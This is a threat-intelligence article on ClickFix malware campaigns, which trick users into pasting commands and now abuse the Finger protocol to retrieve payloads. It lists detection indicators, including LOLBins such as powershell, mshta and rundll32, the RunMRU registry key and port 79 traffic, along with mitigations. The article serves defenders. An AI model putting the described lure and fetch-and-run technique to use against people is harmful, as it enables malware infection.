A novel twist in the ongoing ClickFix malware campaigns has security researchers observing the abuse of the decades-old Finger protocol. Threat actors are now using this legacy service to retrieve remote commands for execution on compromised Windows devices, adding a new layer of operational security to the social engineering technique1. This development underscores the continuous evolution of a threat that preys on user actions to bypass automated security controls.
The core ClickFix attack remains a potent social engineering tactic. It manipulates users into manually executing malicious commands by presenting them with fake error messages, browser update alerts, or CAPTCHA verifications. A user, believing they are fixing a problem, clicks a button that secretly copies a malicious command to their clipboard. They are then instructed to paste this command into the Windows Run dialog or a terminal window, effectively using their own privileges to initiate the attack2. This method is effective because it sidesteps security software focused on automated, file-based threats.
For security leadership, the key takeaway is the technique’s widespread adoption and adaptability. ClickFix has been used by a diverse set of threat actors, from prolific spam distributors like TA571 to suspected nation-state groups like UAC-00502. Its low cost and high effectiveness have led to its commercialization, with “builder” kits now available on cybercrime forums. Defense requires a multi-layered approach combining technical controls with specific user training that explicitly warns against pasting unsolicited commands.
Technical Breakdown of the Finger Protocol Integration
The integration of the Finger protocol represents a significant evolution in the ClickFix attack chain. Historically used for querying user information on remote systems, the protocol is now being repurposed as a simple command-and-control (C2) channel. In this adapted attack flow, the initial command copied to the user’s clipboard via pastejacking is no longer the full payload delivery script. Instead, it is a simpler command designed to query a Finger server. This server then responds with the actual, often more complex, PowerShell or batch commands that will be executed on the victim’s machine to download the final malware1.
This method offers several advantages to attackers. It allows for dynamic command updates without changing the initial lure infrastructure. The attacker can modify the payload retrieved by the Finger query at any time, enabling them to switch malware families or adjust evasion techniques on the fly. Furthermore, using a legacy protocol like Finger may help the activity blend in with normal network traffic, as many security monitoring tools may not deeply inspect this service due to its perceived obsolescence. This adds a layer of indirection that can complicate detection and analysis for defenders.
Expanding Threat Landscape and Campaign Analysis
The threat landscape for ClickFix has expanded considerably since its identification in early 2024. The technique is no longer confined to Windows systems; campaigns have been successfully adapted to target macOS and Linux users. A mid-2025 campaign, for instance, impersonated Spectrum services and used a Bash script that prompted users for their system password to download and execute the Atomic macOS Stealer (AMOS)2. The Ohio State University’s security team also warned of a fake DeepSeek AI site that used a drag-and-drop installer for macOS, instructing users to run commands in the Terminal3.
The sophistication of the lures has also increased. A major shift was the widespread adoption of a fake CAPTCHA theme, much of it based on an open-source toolkit named “reCAPTCHA Phish” available on GitHub2. Proofpoint observed this toolkit in active campaigns just days after its release. These lures impersonate services like Cloudflare, claim to “verify you are human,” and use countdown timers and “users verified” counters to create a false sense of urgency and legitimacy4. The latest evolution involves embedded video tutorials that walk users through the process of running the malicious code, making the attack feel more authentic and interactive4.
Detection and Forensic Artifacts for Analysis
For analysts and system administrators, several key artifacts can indicate a ClickFix infection attempt. A primary source of evidence on Windows systems is the RunMRU registry key, located at `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`. This key stores a history of commands executed via the Run dialog. Analysts should look for entries containing living-off-the-land binaries (LOLBins) like `powershell`, `mshta`, or `cmd` followed by suspicious URLs or heavily obfuscated commands. Entries may also contain fake verification messages, such as `✅ “I am not a robot – reCAPTCHA”`2.
Enabling and reviewing PowerShell logging is another critical step. PowerShell Script Block Logging and Module Logging can capture the exact commands executed, even if they were heavily obfuscated when entered via the command line. For network-based detection, monitoring for outbound connections on port 79 (the default Finger protocol port) to unknown external IP addresses can be a strong indicator of compromise, especially if it originates from a user’s workstation following the execution of a suspicious Run command. EDR solutions can be configured to alert on suspicious parent-child process relationships, such as `mshta.exe` spawning `powershell.exe`.
Mitigation Strategies and Defense Recommendations
A robust defense-in-depth strategy is required to counter the ClickFix threat. Technical controls form the first line of defense. Application control tools like Windows AppLocker or WDAC can be configured to restrict the execution of scripts and LOLBins from user-writable locations or when launched from the Run dialog. Endpoint protection and EDR solutions should be tuned to flag or block the execution of high-risk binaries like `mshta` and `rundll32` when they are called with suspicious parameters. Network protection features and DNS security solutions can block connections to known malicious C2 domains and IPs early in the attack chain.
User awareness and training are equally critical. General security vigilance is not sufficient; users need specific training on recognizing ClickFix lures. The guidance from The Ohio State University’s security team is definitive and should be communicated clearly: “DO NOT copy-paste commands of any type if you don’t normally perform this activity as part of your job. Even if you are interacting with a legitimate business or service, there should be no need for you to perform commands in your run dialogue”3. This clear, actionable rule can effectively short-circuit the social engineering aspect of the attack.
The resurrection of the Finger protocol within the ClickFix malware delivery chain is a reminder that attackers consistently seek out overlooked or forgotten technologies to achieve their goals. The core technique’s success lies in its psychological manipulation, turning user helpfulness into a vulnerability. As this threat continues to evolve with multi-platform support, video tutorials, and now legacy protocol abuse, a combined approach of stringent technical controls and continuously updated user education remains the most effective defense. Security teams should ensure their monitoring strategies account for the abuse of legacy network services and maintain a high degree of skepticism toward any process that requires manual command execution from an untrusted source.
